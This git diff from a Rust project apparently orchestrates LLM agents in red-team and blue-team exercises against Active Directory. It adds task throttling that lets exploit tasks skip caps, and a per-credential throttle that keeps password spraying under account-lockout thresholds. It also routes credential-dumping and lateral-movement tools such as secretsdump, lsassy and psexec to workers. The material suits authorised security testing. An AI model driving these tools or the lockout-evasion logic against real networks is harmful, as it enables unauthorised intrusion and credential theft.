critical_path_bypasses_hard_cap() { + let (t, tracker) = make_throttler(2); + for i in 0..3 { + tracker + .add(ActiveTask { + task_id: format!("t{i}"), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: Instant::now(), + }) + .await; + } + let payload = json!({"vuln_type": "constrained_delegation"}); + assert_eq!( + t.check("exploit", "privesc", Some(&payload)).await, + ThrottleDecision::Allow + ); + } + + #[tokio::test] + async fn critical_path_delegation_enum() { + let (t, tracker) = make_throttler(2); + for i in 0..3 { + tracker + .add(ActiveTask { + task_id: format!("t{i}"), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: Instant::now(), + }) + .await; + } + let payload = json!({"techniques": ["find_delegation"]}); + assert_eq!( + t.check("privesc_enumeration", "privesc", Some(&payload)) + .await, + ThrottleDecision::Allow + ); + } + + #[tokio::test] + async fn critical_path_esc8_coercion() { + let (t, tracker) = make_throttler(2); + for i in 0..3 { + tracker + .add(ActiveTask { + task_id: format!("t{i}"), + task_type: "recon".into(), + role: "recon".into(), + submitted_at: Instant::now(), + }) + .await; + } + let payload = json!({"techniques": ["petitpotam"]}); + assert_eq!( + t.check("coercion", "coercion", Some(&payload)).await, + ThrottleDecision::Allow + ); + } + + #[tokio::test] + async fn rate_limit_triggers_backoff() { + let (t, _) = make_throttler(8); + t.record_rate_limit_error().await; + t.record_rate_limit_error().await; + t.record_rate_limit_error().await; // threshold=3 + assert!(matches!( + t.check("recon", "recon", None).await, + ThrottleDecision::Wait(_) + )); + } + + #[tokio::test] + async fn clear_error_prevents_backoff() { + let (t, _) = make_throttler(8); + t.record_rate_limit_error().await; + t.record_rate_limit_error().await; + t.clear_rate_limit_error().await; // back to 1 + t.record_rate_limit_error().await; // now 2 + assert_eq!( + t.check("recon", "recon", None).await, + ThrottleDecision::Allow + ); + } + + #[tokio::test] + async fn role_semaphore_limits() { + let (t, _) = make_throttler(8); + let _p1 = t.acquire_role_permit("recon").await; + let _p2 = t.acquire_role_permit("recon").await; + let _p3 = t.acquire_role_permit("recon").await; + assert!(_p1.is_some() && _p2.is_some() && _p3.is_some()); + assert!(t.acquire_role_permit("recon").await.is_none()); + assert!(t.acquire_role_permit("lateral").await.is_some()); + } +} diff --git a/ares-cli/src/orchestrator/tool_dispatcher/auth_throttle.rs b/ares-cli/src/orchestrator/tool_dispatcher/auth_throttle.rs new file mode 100644 index 00000000..c6ae3023 --- /dev/null +++ b/ares-cli/src/orchestrator/tool_dispatcher/auth_throttle.rs @@ -0,0 +1,88 @@ +//! Per-credential auth throttle to prevent AD account lockout. + +use std::sync::Arc; +use std::time::{Duration, Instant}; + +use tokio::sync::Mutex; +use tracing::debug; + +/// Per-credential auth attempt tracker. +/// +/// Tracks timestamps of auth-bearing tool dispatches keyed by `user@domain`. +/// Before dispatching, callers must call `acquire()` which sleeps if the +/// credential has been used too many times within the observation window. +/// +/// Default policy: max 3 auth attempts per credential per 60-second window. +/// This stays well under the typical AD lockout threshold (5 in 5 min). +#[derive(Clone)] +pub struct AuthThrottle { + pub(super) inner: Arc>, +} + +pub(super) struct AuthThrottleInner { + /// `credential_key` → Vec of timestamps + pub(super) attempts: std::collections::HashMap>, + /// Max auth attempts per credential within the observation window. + pub(super) max_attempts: usize, + /// Observation window for rate limiting. + pub(super) window: Duration, +} + +impl AuthThrottle { + pub fn new(max_attempts: usize, window: Duration) -> Self { + Self { + inner: Arc::new(Mutex::new(AuthThrottleInner { + attempts: std::collections::HashMap::new(), + max_attempts, + window, + })), + } + } + + /// Acquire permission to dispatch an auth-bearing tool call. + /// Sleeps if the credential has hit the rate limit within the window. + pub async fn acquire(&self, credential_key: &str) { + loop { + let sleep_dur = { + let mut inner = self.inner.lock().await; + let now = Instant::now(); + let max_attempts = inner.max_attempts; + let window = inner.window; + + let timestamps = inner + .attempts + .entry(credential_key.to_string()) + .or_default(); + + // Prune expired entries + timestamps.retain(|t| now.duration_since(*t) < window); + + if timestamps.len() < max_attempts { + // Under the limit — record this attempt and proceed + timestamps.push(now); + return; + } + + // Over the limit — calculate how long to wait until the oldest + // attempt falls outside the window + let oldest = timestamps[0]; + let elapsed = now.duration_since(oldest); + if elapsed >= window { + // Edge case: already expired, prune and retry + timestamps.remove(0); + timestamps.push(now); + return; + } + + window - elapsed + Duration::from_millis(100) + }; + + debug!( + credential = credential_key, + wait_secs = sleep_dur.as_secs_f32(), + "Auth throttle: delaying tool dispatch to avoid account lockout" + ); + tokio::time::sleep(sleep_dur).await; + } + } +} diff --git a/ares-cli/src/orchestrator/tool_dispatcher/local.rs b/ares-cli/src/orchestrator/tool_dispatcher/local.rs new file mode 100644 index 00000000..ef5e9505 --- /dev/null +++ b/ares-cli/src/orchestrator/tool_dispatcher/local.rs @@ -0,0 +1,91 @@ +//! In-process tool dispatcher (no Redis). + +use anyhow::Result; +use tracing::debug; + +use ares_llm::{ToolCall, ToolExecResult}; + +use crate::orchestrator::task_queue::TaskQueue; + +use super::{extract_credential_key, push_realtime_discoveries, AuthThrottle}; + +/// Dispatches tool calls directly via `ares_tools::dispatch` without Redis. +/// +/// Useful for testing, single-binary deployments, or when workers are +/// colocated in the same process as the orchestrator. +pub struct LocalToolDispatcher { + pub(super) queue: TaskQueue, + pub(super) operation_id: String, + pub(super) auth_throttle: AuthThrottle, +} + +impl LocalToolDispatcher { + pub fn new(queue: TaskQueue, operation_id: String, auth_throttle: AuthThrottle) -> Self { + Self { + queue, + operation_id, + auth_throttle, + } + } +} + +#[async_trait::async_trait] +impl ares_llm::ToolDispatcher for LocalToolDispatcher { + async fn dispatch_tool( + &self, + _role: &str, + _task_id: &str, + call: &ToolCall, + ) -> Result { + // Rate-limit auth-bearing tools to prevent AD account lockout + if let Some(cred_key) = extract_credential_key(call) { + self.auth_throttle.acquire(&cred_key).await; + } + + debug!(tool = %call.name, "Executing tool locally"); + + match ares_tools::dispatch(&call.name, &call.arguments).await { + Ok(output) => { + let raw = output.combined_raw(); + let combined = output.combined(); + let error = if output.success { + None + } else { + Some(format!("tool exited with code {:?}", output.exit_code)) + }; + + // Parse structured discoveries from raw (unfiltered) output + let discoveries = + ares_tools::parsers::parse_tool_output(&call.name, &raw, &call.arguments); + let discoveries = if discoveries.as_object().is_none_or(|o| o.is_empty()) { + None + } else { + Some(discoveries) + }; + + // Push discoveries to real-time list immediately (like RedisToolDispatcher) + if let Some(ref disc) = discoveries { + push_realtime_discoveries( + &self.queue, + &self.operation_id, + disc, + &call.name, + &call.arguments, + ) + .await; + } + + Ok(ToolExecResult { + output: combined, + error, + discoveries, + }) + } + Err(e) => Ok(ToolExecResult { + output: String::new(), + error: Some(e.to_string()), + discoveries: None, + }), + } + } +} diff --git a/ares-cli/src/orchestrator/tool_dispatcher/mod.rs b/ares-cli/src/orchestrator/tool_dispatcher/mod.rs new file mode 100644 index 00000000..6384bd5b --- /dev/null +++ b/ares-cli/src/orchestrator/tool_dispatcher/mod.rs @@ -0,0 +1,228 @@ +//! Redis-backed tool dispatcher for the LLM agent loop. +//! +//! Implements `ares_llm::ToolDispatcher` by pushing individual tool calls +//! to a Redis queue (`ares:tool_exec:{role}`) and waiting for results +//! on a per-call mailbox (`ares:tool_results:{call_id}`). +//! +//! Rust workers run a tool executor that BRPOPs from `tool_exec`, +//! invokes the tool via `ares_tools::dispatch`, and LPUSHes the result. +//! +//! Also provides [`LocalToolDispatcher`] for in-process execution without +//! going through Redis, useful for testing or single-binary deployments. + +use redis::AsyncCommands; +use serde::{Deserialize, Serialize}; +use tracing::debug; + +use crate::orchestrator::state::DISCOVERY_KEY_PREFIX; +use crate::orchestrator::task_queue::TaskQueue; + +mod auth_throttle; +mod local; +mod redis_dispatcher; +#[cfg(test)] +mod tests; + +pub use auth_throttle::AuthThrottle; +pub use local::LocalToolDispatcher; +pub use redis_dispatcher::RedisToolDispatcher; + +// --------------------------------------------------------------------------- +// Wire format +// --------------------------------------------------------------------------- + +/// Message pushed to the tool execution queue. +#[derive(Debug, Serialize, Deserialize)] +pub struct ToolExecRequest { + pub call_id: String, + pub task_id: String, + pub tool_name: String, + pub arguments: serde_json::Value, + /// W3C traceparent header for cross-service span linking. + #[serde(skip_serializing_if = "Option::is_none", default)] + pub traceparent: Option, + /// Operation ID for span correlation with dashboards. + #[serde(skip_serializing_if = "Option::is_none", default)] + pub operation_id: Option, +} + +/// Message returned by the worker on the result mailbox. +#[derive(Debug, Serialize, Deserialize)] +pub struct ToolExecResponse { + pub call_id: String, + pub output: String, + pub error: Option, + /// Structured discoveries parsed by the worker from tool output. + #[serde(default)] + pub discoveries: Option, +} + +// --------------------------------------------------------------------------- +// Constants +// --------------------------------------------------------------------------- + +/// Prefix for tool execution request queues. +pub(super) const TOOL_EXEC_PREFIX: &str = "ares:tool_exec"; + +/// Prefix for per-call result mailboxes. +pub(super) const TOOL_RESULT_PREFIX: &str = "ares:tool_results"; + +/// TTL for result keys (1 hour). +pub(super) const RESULT_TTL_SECS: u64 = 3600; + +/// Default timeout waiting for a tool result (25 minutes). +/// Must exceed queue wait time + longest tool runtime (hashcat can queue +/// behind another hashcat, so 2x runtime + buffer). +pub(super) const DEFAULT_TOOL_TIMEOUT_SECS: u64 = 1500; + +// --------------------------------------------------------------------------- +// Dispatcher helpers +// --------------------------------------------------------------------------- + +/// Tools that require netexec/ldapsearch and must be routed to the recon +/// worker queue regardless of the calling agent's role. +const RECON_ROUTED_TOOLS: &[&str] = &[ + "ldap_search_descriptions", + "password_spray", + "username_as_password", + "gpp_password_finder", + "sysvol_script_search", + "password_policy", + "laps_dump", + "smbclient_spider", + "check_credman_entries", + "check_autologon_registry", + "domain_admin_checker", + "gmsa_dump_passwords", +]; + +/// Tools that authenticate against AD targets. Tool calls with these names +/// are subject to per-credential rate limiting to avoid account lockout. +const AUTH_BEARING_TOOLS: &[&str] = &[ + // netexec tools (each invocation is a separate SMB/LDAP auth) + "ldap_search_descriptions", + "password_spray", + "username_as_password", + "gpp_password_finder", + "sysvol_script_search", + "password_policy", + "laps_dump", + "smbclient_spider", + "check_credman_entries", + "check_autologon_registry", + "domain_admin_checker", + "gmsa_dump_passwords", + // impacket tools + "secretsdump", + "secretsdump_kerberos", + "kerberoast", + "asrep_roast", + "lsassy", + "ntds_dit_extract", + // lateral tools (auth per target) + "smbexec", + "psexec", + "wmiexec", + "dcomexec", + "atexec", + "smbclient_kerberos_shares", +]; + +/// Extract a credential key from tool call arguments for rate limiting. +/// Returns `Some("user@domain")` if the tool authenticates with credentials. +pub(super) fn extract_credential_key(call: &ares_llm::ToolCall) -> Option { + if !AUTH_BEARING_TOOLS.contains(&call.name.as_str()) { + return None; + } + let username = call.arguments.get("username").and_then(|v| v.as_str())?; + let domain = call + .arguments + .get("domain") + .and_then(|v| v.as_str()) + .filter(|s| !s.is_empty()) + .unwrap_or("unknown"); + Some(format!( + "{}@{}", + username.to_lowercase(), + domain.to_lowercase() + )) +} + +/// Resolve the actual worker queue for a tool call. +/// +/// Most tools go to the calling agent's role queue. Netexec-dependent tools +/// are cross-routed to the `recon` queue where the binary exists. +pub(super) fn resolve_queue_role<'a>(role: &'a str, tool_name: &str) -> &'a str { + if role != "recon" && RECON_ROUTED_TOOLS.contains(&tool_name) { + "recon" + } else { + role + } +} + +/// Push structured discoveries from a tool result to the real-time +/// discovery list so the discovery poller publishes them to state. +/// +/// `tool_args` carries the tool call's input arguments — used to extract +/// the authenticating credential (username/domain) for lineage tracking. +pub(super) async fn push_realtime_discoveries( + queue: &TaskQueue, + operation_id: &str, + discoveries: &serde_json::Value, + tool_name: &str, + tool_args: &serde_json::Value, +) { + let discovery_key = format!("{DISCOVERY_KEY_PREFIX}:{operation_id}"); + let mut conn = queue.connection(); + + // Extract input credential context for lineage tracking + let input_username = tool_args + .get("username") + .or_else(|| tool_args.get("user")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + let input_domain = tool_args + .get("domain") + .and_then(|v| v.as_str()) + .unwrap_or(""); + + // Push each discovery type as individual entries + let type_map: &[(&str, &str)] = &[ + ("hosts", "host"), + ("credentials", "credential"), + ("hashes", "hash"), + ("vulnerabilities", "vulnerability"), + ("shares", "share"), + ("discovered_users", "user"), + ]; + + let mut pushed = 0usize; + for &(key, disc_type) in type_map { + if let Some(items) = discoveries.get(key).and_then(|v| v.as_array()) { + for item in items { + let mut entry = serde_json::json!({ + "type": disc_type, + "data": item, + "source_tool": tool_name, + }); + // Attach input credential context for lineage resolution + if !input_username.is_empty() { + entry["input_username"] = serde_json::Value::String(input_username.to_string()); + entry["input_domain"] = serde_json::Value::String(input_domain.to_string()); + } + if let Ok(json) = serde_json::to_string(&entry) { + let _: anyhow::Result<(), _> = conn.lpush(&discovery_key, &json).await; + pushed += 1; + } + } + } + } + + if pushed > 0 { + debug!( + count = pushed, + tool = tool_name, + "Pushed real-time discoveries" + ); + } +} diff --git a/ares-cli/src/orchestrator/tool_dispatcher/redis_dispatcher.rs b/ares-cli/src/orchestrator/tool_dispatcher/redis_dispatcher.rs new file mode 100644 index 00000000..5ef564bf --- /dev/null +++ b/ares-cli/src/orchestrator/tool_dispatcher/redis_dispatcher.rs @@ -0,0 +1,165 @@ +//! Redis-backed tool dispatcher. + +use anyhow::{Context, Result}; +use redis::AsyncCommands; +use tracing::{debug, warn, Instrument}; + +use ares_core::telemetry::propagation::inject_traceparent; +use ares_core::telemetry::spans::{producer_span, Team}; +use ares_llm::{ToolCall, ToolExecResult}; + +use crate::orchestrator::task_queue::TaskQueue; + +use super::{ + extract_credential_key, push_realtime_discoveries, AuthThrottle, ToolExecRequest, + ToolExecResponse, RESULT_TTL_SECS, TOOL_EXEC_PREFIX, TOOL_RESULT_PREFIX, +}; + +/// Dispatches tool calls to workers via Redis queues. +/// +/// When tool results contain structured discoveries (hosts, credentials, etc.), +/// they are pushed to the `ares:discoveries:{op_id}` list for real-time +/// processing by the discovery poller — ensuring discoveries reach state +/// immediately rather than waiting for the task result consumer. +pub struct RedisToolDispatcher { + pub(super) queue: TaskQueue, + pub(super) tool_timeout: std::time::Duration, + pub(super) operation_id: String, + pub(super) auth_throttle: AuthThrottle, +} + +impl RedisToolDispatcher { + pub fn new(queue: TaskQueue, operation_id: String, auth_throttle: AuthThrottle) -> Self { + Self { + queue, + tool_timeout: std::time::Duration::from_secs(super::DEFAULT_TOOL_TIMEOUT_SECS), + operation_id, + auth_throttle, + } + } +} + +#[async_trait::async_trait] +impl ares_llm::ToolDispatcher for RedisToolDispatcher { + async fn dispatch_tool( + &self, + role: &str, + task_id: &str, + call: &ToolCall, + ) -> Result { + let effective_role = super::resolve_queue_role(role, &call.name); + let span = producer_span( + &format!("dispatch.{}", call.name), + role, + Team::Red, + &format!("ares-worker-{effective_role}"), + ); + + async { + // Rate-limit auth-bearing tools to prevent AD account lockout + if let Some(cred_key) = extract_credential_key(call) { + self.auth_throttle.acquire(&cred_key).await; + } + + let call_id = format!("{}_{}", call.name, uuid::Uuid::new_v4().simple()); + + // Inject trace context for cross-service span linking + let traceparent = inject_traceparent(&tracing::Span::current()); + + let request = ToolExecRequest { + call_id: call_id.clone(), + task_id: task_id.to_string(), + tool_name: call.name.clone(), + arguments: call.arguments.clone(), + traceparent, + operation_id: Some(self.operation_id.clone()), + }; + + let queue_key = format!("{TOOL_EXEC_PREFIX}:{effective_role}"); + let result_key = format!("{TOOL_RESULT_PREFIX}:{call_id}"); + let payload = + serde_json::to_string(&request).context("Failed to serialize tool exec request")?; + + debug!( + tool = %call.name, + call_id = %call_id, + queue = %queue_key, + effective_role = %effective_role, + "Dispatching tool call to worker" + ); + + // Push request to worker queue + let mut conn = self.queue.connection(); + conn.lpush::<_, _, ()>(&queue_key, &payload) + .await + .context("Failed to push tool exec request to Redis")?; + + // Wait for result with timeout + let timeout_secs = self.tool_timeout.as_secs().max(1) as f64; + let brpop_result: Option<(String, String)> = redis::cmd("BRPOP") + .arg(&result_key) + .arg(timeout_secs) + .query_async(&mut conn) + .await + .context("BRPOP failed for tool result")?; + + match brpop_result { + Some((_key, value)) => { + let response: ToolExecResponse = serde_json::from_str(&value) + .context("Failed to deserialize tool exec response")?; + + debug!( + tool = %call.name, + call_id = %call_id, + has_error = response.error.is_some(), + "Tool result received" + ); + + // Push discoveries to the real-time discovery list so + // the discovery poller publishes them to state immediately, + // independent of the task result consumer. + if let Some(ref disc) = response.discoveries { + push_realtime_discoveries( + &self.queue, + &self.operation_id, + disc, + &call.name, + &call.arguments, + ) + .await; + } + + Ok(ToolExecResult { + output: response.output, + error: response.error, + discoveries: response.discoveries, + }) + } + None => { + warn!( + tool = %call.name, + call_id = %call_id, + timeout_secs = timeout_secs, + "Tool execution timed out" + ); + + // Clean up any late result + let _: Result<(), _> = conn + .expire::<_, ()>(&result_key, RESULT_TTL_SECS as i64) + .await; + + Ok(ToolExecResult { + output: String::new(), + error: Some(format!( + "Tool '{}' timed out after {timeout_secs}s", + call.name + )), + discoveries: None, + }) + } + } + } + .instrument(span) + .await + } +} diff --git a/ares-cli/src/orchestrator/tool_dispatcher/tests.rs b/ares-cli/src/orchestrator/tool_dispatcher/tests.rs new file mode 100644 index 00000000..00d9940a --- /dev/null +++ b/ares-cli/src/orchestrator/tool_dispatcher/tests.rs @@ -0,0 +1,98 @@ +use super::*; + +#[test] +fn test_tool_exec_request_serialization() { + let req = ToolExecRequest { + call_id: "nmap_scan_abc123".into(), + task_id: "recon_def456".into(), + tool_name: "nmap_scan".into(), + arguments: serde_json::json!({"target": "192.168.58.0/24"}), + traceparent: None, + operation_id: Some("op-20260415-120000".into()), + }; + + let json = serde_json::to_string(&req).unwrap(); + let parsed: ToolExecRequest = serde_json::from_str(&json).unwrap(); + assert_eq!(parsed.call_id, "nmap_scan_abc123"); + assert_eq!(parsed.tool_name, "nmap_scan"); +} + +#[test] +fn test_tool_exec_response_deserialization() { + let json = r#"{"call_id":"nmap_scan_abc","output":"Found 5 hosts","error":null}"#; + let resp: ToolExecResponse = serde_json::from_str(json).unwrap(); + assert_eq!(resp.output, "Found 5 hosts"); + assert!(resp.error.is_none()); +} + +#[test] +fn test_tool_exec_response_with_error() { + let json = r#"{"call_id":"x","output":"","error":"Connection refused"}"#; + let resp: ToolExecResponse = serde_json::from_str(json).unwrap(); + assert_eq!(resp.error.as_deref(), Some("Connection refused")); +} + +#[test] +fn test_cross_role_routing_netexec_tools() { + // Netexec tools called from credential_access should route to recon + assert_eq!( + resolve_queue_role("credential_access", "password_spray"), + "recon" + ); + assert_eq!( + resolve_queue_role("credential_access", "username_as_password"), + "recon" + ); + assert_eq!( + resolve_queue_role("credential_access", "ldap_search_descriptions"), + "recon" + ); + assert_eq!( + resolve_queue_role("credential_access", "gpp_password_finder"), + "recon" + ); + assert_eq!( + resolve_queue_role("credential_access", "sysvol_script_search"), + "recon" + ); + assert_eq!( + resolve_queue_role("credential_access", "laps_dump"), + "recon" + ); + assert_eq!( + resolve_queue_role("credential_access", "smbclient_spider"), + "recon" + ); + assert_eq!( + resolve_queue_role("credential_access", "password_policy"), + "recon" + ); +} + +#[test] +fn test_cross_role_routing_native_tools_stay() { + // Tools native to credential_access should stay on credential_access + assert_eq!( + resolve_queue_role("credential_access", "secretsdump"), + "credential_access" + ); + assert_eq!( + resolve_queue_role("credential_access", "kerberoast"), + "credential_access" + ); + assert_eq!( + resolve_queue_role("credential_access", "lsassy"), + "credential_access" + ); +} + +#[test] +fn test_cross_role_routing_recon_stays_recon() { + // When recon itself calls these tools, they stay on recon + assert_eq!(resolve_queue_role("recon", "password_spray"), "recon"); + assert_eq!(resolve_queue_role("recon", "nmap_scan"), "recon"); + assert_eq!( + resolve_queue_role("recon", "ldap_search_descriptions"), + "recon" + ); +} diff --git a/ares-cli/src/transport.rs b/ares-cli/src/transport.rs index 4da441d5..42ba70ae 100644 --- a/ares-cli/src/transport.rs +++ b/ares-cli/src/transport.rs @@ -1,8 +1,8 @@ -//! K8s and EC2 transport: re-exec ares-cli commands via kubectl or SSM. +//! K8s and EC2 transport: re-exec ares commands via kubectl or SSM. //! //! When `--k8s ` is passed, this module strips the transport flags //! from argv and re-runs the command on the target pod. This eliminates ~25 -//! boilerplate Taskfile wrappers that just do `kubectl exec ... ares-cli ...`. +//! boilerplate Taskfile wrappers that just do `kubectl exec ... ares ...`. //! //! When `--ec2 ` is passed, this module resolves the EC2 instance by //! Name tag and executes via AWS SSM send-command, polling for results. @@ -167,7 +167,7 @@ pub(crate) fn maybe_exec_k8s() -> Option { "--", "env", "RUST_LOG=error", - "ares-cli", + "ares", ]); cmd.args(&inner_args); @@ -393,7 +393,7 @@ pub(crate) fn maybe_exec_ec2() -> Option { } }; - let cli_cmd = format!("RUST_LOG=error ares-cli {}", shell_join(&inner_args)); + let cli_cmd = format!("RUST_LOG=error ares {}", shell_join(&inner_args)); let cmd_id = match ssm_send_command(&instance_id, &cli_cmd, &profile, ®ion) { Ok(id) => id, diff --git a/ares-cli/src/worker/blue_task_loop.rs b/ares-cli/src/worker/blue_task_loop.rs new file mode 100644 index 00000000..8b992e24 --- /dev/null +++ b/ares-cli/src/worker/blue_task_loop.rs @@ -0,0 +1,385 @@ +//! Blue team task consumption loop. +//! +//! Consumes tasks from `ares:blue:tasks:global:{role}`, runs the blue +//! team LLM agent loop with appropriate tools, and pushes results back +//! to `ares:blue:results:{task_id}`. +//! +//! This parallels the red team `task_loop` but uses: +//! - Blue task queue keys (`ares:blue:tasks:*`) +//! - Blue tool definitions from `ares_llm::tool_registry::blue` +//! - Blue prompt templates +//! - Blue state writer for investigation state mutations +//! - HTTP-based tools (Loki, Prometheus) instead of CLI wrappers + +use std::sync::Arc; +use std::time::Duration; + +use anyhow::Result; +use tracing::{debug, error, info, warn}; + +use ares_core::state::blue_task_queue::{BlueTaskMessage, BlueTaskQueue, BlueTaskResult}; +use ares_llm::tool_registry::blue::{self, BlueAgentRole}; +use ares_llm::{run_agent_loop, AgentLoopConfig, LlmProvider, LoopEndReason, ToolDispatcher}; + +use crate::worker::config::WorkerConfig; +use crate::worker::heartbeat::WorkerStatus; + +/// Run the blue team task consumption loop until shutdown. +pub async fn run_blue_task_loop( + config: &WorkerConfig, + conn: redis::aio::ConnectionManager, + provider: Box, + dispatcher: Arc, + model_name: String, + status_tx: tokio::sync::watch::Sender, + shutdown: Arc, +) -> Result<()> { + let role = parse_blue_role(&config.worker_role); + let role_str = role.as_str(); + + info!( + role = role_str, + agent = %config.agent_name, + "Starting blue team task loop" + ); + + let mut task_queue = BlueTaskQueue::from_conn(conn); + + let mut retry_delay = Duration::from_secs(1); + let max_retry_delay = Duration::from_secs(60); + + loop { + let poll_result = tokio::select! { + result = task_queue.poll_global_task(role_str, config.poll_timeout.as_secs_f64()) => result, + _ = shutdown.notified() => { + info!("Blue task loop: shutdown signalled"); + return Ok(()); + } + }; + + match poll_result { + Ok(Some(task)) => { + retry_delay = Duration::from_secs(1); + + let _ = status_tx.send(WorkerStatus { + status: "busy".to_string(), + current_task: Some(task.task_id.clone()), + }); + + // Send blue team heartbeat + let _ = task_queue + .send_heartbeat( + &config.agent_name, + "busy", + Some(&task.task_id), + role_str, + Some(&task.investigation_id), + ) + .await; + + // Execute the blue team task + let result = execute_blue_task( + &task, + role, + provider.as_ref(), + Arc::clone(&dispatcher), + &model_name, + &config.agent_name, + ) + .await; + + // Push result + if let Err(e) = task_queue.send_result(&result).await { + error!( + task_id = %task.task_id, + err = %e, + "Failed to send blue task result" + ); + } + + let _ = status_tx.send(WorkerStatus { + status: "idle".to_string(), + current_task: None, + }); + + let _ = task_queue + .send_heartbeat( + &config.agent_name, + "idle", + None, + role_str, + Some(&task.investigation_id), + ) + .await; + } + Ok(None) => { + retry_delay = Duration::from_secs(1); + } + Err(e) => { + let error_str = e.to_string().to_lowercase(); + let is_conn_error = ["connection", "closed", "timeout", "broken", "reset"] + .iter() + .any(|kw| error_str.contains(kw)); + + if is_conn_error { + warn!( + delay_secs = retry_delay.as_secs(), + "Blue task loop: connection error, retrying: {e}" + ); + tokio::select! { + _ = tokio::time::sleep(retry_delay) => {} + _ = shutdown.notified() => return Ok(()), + } + retry_delay = (retry_delay * 2).min(max_retry_delay); + } else { + error!("Blue task loop: non-connection error: {e}"); + tokio::select! { + _ = tokio::time::sleep(Duration::from_secs(5)) => {} + _ = shutdown.notified() => return Ok(()), + } + retry_delay = Duration::from_secs(1); + } + } + } + } +} + +/// Execute a single blue team task through the LLM agent loop. +async fn execute_blue_task( + task: &BlueTaskMessage, + role: BlueAgentRole, + provider: &dyn LlmProvider, + dispatcher: Arc, + model_name: &str, + agent_name: &str, +) -> BlueTaskResult { + info!( + task_id = %task.task_id, + task_type = %task.task_type, + role = role.as_str(), + investigation_id = %task.investigation_id, + "Executing blue team task" + ); + + // Build tools for this role + let tools = blue::blue_tools_for_role(role); + let capabilities: Vec = tools + .iter() + .filter(|t| !blue::is_blue_callback_tool(&t.name)) + .map(|t| t.name.clone()) + .collect(); + + // Build system prompt + let system_prompt = + match ares_llm::prompt::blue::build_blue_system_prompt(role.as_str(), &capabilities) { + Ok(p) => p, + Err(e) => { + return BlueTaskResult::failure( + &task.task_id, + &task.investigation_id, + format!("Failed to build system prompt: {e}"), + agent_name, + ); + } + }; + + // Build task prompt + // First try to load investigation state summary (best-effort) + let state_summary = "Investigation in progress.".to_string(); + + let task_prompt = match ares_llm::prompt::blue::generate_blue_task_prompt( + &task.task_type, + &task.task_id, + &task.params, + &state_summary, + ) { + Some(p) => p, + None => { + // Fallback: use raw params as prompt + format!( + "## Task: {}\n\nType: {}\nInvestigation: {}\n\nParameters:\n```json\n{}\n```\n\n\ + Complete this task and call the appropriate completion callback.", + task.task_id, + task.task_type, + task.investigation_id, + serde_json::to_string_pretty(&task.params).unwrap_or_default() + ) + } + }; + + let config = AgentLoopConfig { + model: model_name.to_string(), + max_steps: 50, + max_tool_calls_per_name: 25, + ..AgentLoopConfig::default() + }; + + // Run the agent loop + let outcome = run_agent_loop( + provider, + dispatcher, + &config, + &system_prompt, + &task_prompt, + role.as_str(), + &task.task_id, + &tools, + None, // No custom callback handler for worker tasks + ) + .await; + + // Convert outcome to BlueTaskResult + match &outcome.reason { + LoopEndReason::TaskComplete { result, .. } => { + info!( + task_id = %task.task_id, + steps = outcome.steps, + tool_calls = outcome.tool_calls_dispatched, + "Blue task completed" + ); + BlueTaskResult::success( + &task.task_id, + &task.investigation_id, + serde_json::json!({ + "summary": result, + "steps": outcome.steps, + "tool_calls": outcome.tool_calls_dispatched, + }), + agent_name, + ) + } + LoopEndReason::EndTurn { content } => BlueTaskResult::success( + &task.task_id, + &task.investigation_id, + serde_json::json!({ + "summary": content, + "steps": outcome.steps, + }), + agent_name, + ), + LoopEndReason::RequestAssistance { issue, context } => BlueTaskResult::failure( + &task.task_id, + &task.investigation_id, + format!("Assistance needed: {issue} (context: {context})"), + agent_name, + ), + LoopEndReason::MaxSteps => { + warn!(task_id = %task.task_id, steps = outcome.steps, "Blue task hit max steps"); + BlueTaskResult::failure( + &task.task_id, + &task.investigation_id, + format!("Hit max steps ({})", outcome.steps), + agent_name, + ) + } + LoopEndReason::MaxTokens => BlueTaskResult::failure( + &task.task_id, + &task.investigation_id, + "Hit max tokens".into(), + agent_name, + ), + LoopEndReason::Error(err) => { + error!(task_id = %task.task_id, err = %err, "Blue task error"); + BlueTaskResult::failure( + &task.task_id, + &task.investigation_id, + err.clone(), + agent_name, + ) + } + } +} + +/// Parse a worker role string into a BlueAgentRole. +fn parse_blue_role(role: &str) -> BlueAgentRole { + match role { + "triage" => BlueAgentRole::Triage, + "threat_hunter" => BlueAgentRole::ThreatHunter, + "lateral_analyst" => BlueAgentRole::LateralAnalyst, + "escalation_triage" => BlueAgentRole::EscalationTriage, + "blue_orchestrator" => BlueAgentRole::Orchestrator, + _ => { + warn!(role = role, "Unknown blue team role, defaulting to Triage"); + BlueAgentRole::Triage + } + } +} + +/// Blue team tool dispatcher that handles HTTP-based tools locally. +/// +/// Blue team tools (Loki, Prometheus, detection queries) are HTTP-based +/// and don't need worker dispatch — they run in-process. +pub struct BlueLocalToolDispatcher; + +impl BlueLocalToolDispatcher { + pub fn new() -> Self { + Self + } +} + +#[async_trait::async_trait] +impl ToolDispatcher for BlueLocalToolDispatcher { + async fn dispatch_tool( + &self, + _role: &str, + _task_id: &str, + call: &ares_llm::ToolCall, + ) -> Result { + debug!(tool = %call.name, "Executing blue team tool locally"); + + // Check if this is a blue team HTTP tool + if ares_tools::blue::is_blue_tool(&call.name) { + match ares_tools::blue::dispatch_blue(&call.name, &call.arguments).await { + Ok(output) => { + let error = if output.success { + None + } else { + Some(output.stderr.clone()) + }; + Ok(ares_llm::ToolExecResult { + output: output.stdout, + error, + discoveries: None, + }) + } + Err(e) => Ok(ares_llm::ToolExecResult { + output: String::new(), + error: Some(e.to_string()), + discoveries: None, + }), + } + } else { + // Unknown tool + Ok(ares_llm::ToolExecResult { + output: String::new(), + error: Some(format!("Unknown blue team tool: {}", call.name)), + discoveries: None, + }) + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_parse_blue_role() { + assert_eq!(parse_blue_role("triage").as_str(), "triage"); + assert_eq!(parse_blue_role("threat_hunter").as_str(), "threat_hunter"); + assert_eq!( + parse_blue_role("lateral_analyst").as_str(), + "lateral_analyst" + ); + assert_eq!( + parse_blue_role("escalation_triage").as_str(), + "escalation_triage" + ); + assert_eq!( + parse_blue_role("blue_orchestrator").as_str(), + "blue_orchestrator" + ); + // Unknown defaults to triage + assert_eq!(parse_blue_role("unknown").as_str(), "triage"); + } +} diff --git a/ares-cli/src/worker/config.rs b/ares-cli/src/worker/config.rs new file mode 100644 index 00000000..d3816b1a --- /dev/null +++ b/ares-cli/src/worker/config.rs @@ -0,0 +1,199 @@ +//! Worker configuration from environment variables. 